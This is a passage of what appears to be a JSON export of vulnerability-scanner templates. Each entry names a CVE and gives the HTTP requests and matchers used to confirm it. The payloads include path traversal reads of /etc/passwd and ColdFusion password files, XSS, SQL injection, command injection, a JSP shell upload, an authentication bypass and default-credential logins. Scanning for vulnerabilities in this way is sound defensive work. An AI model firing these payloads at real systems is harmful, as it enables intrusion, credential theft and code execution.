<= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File 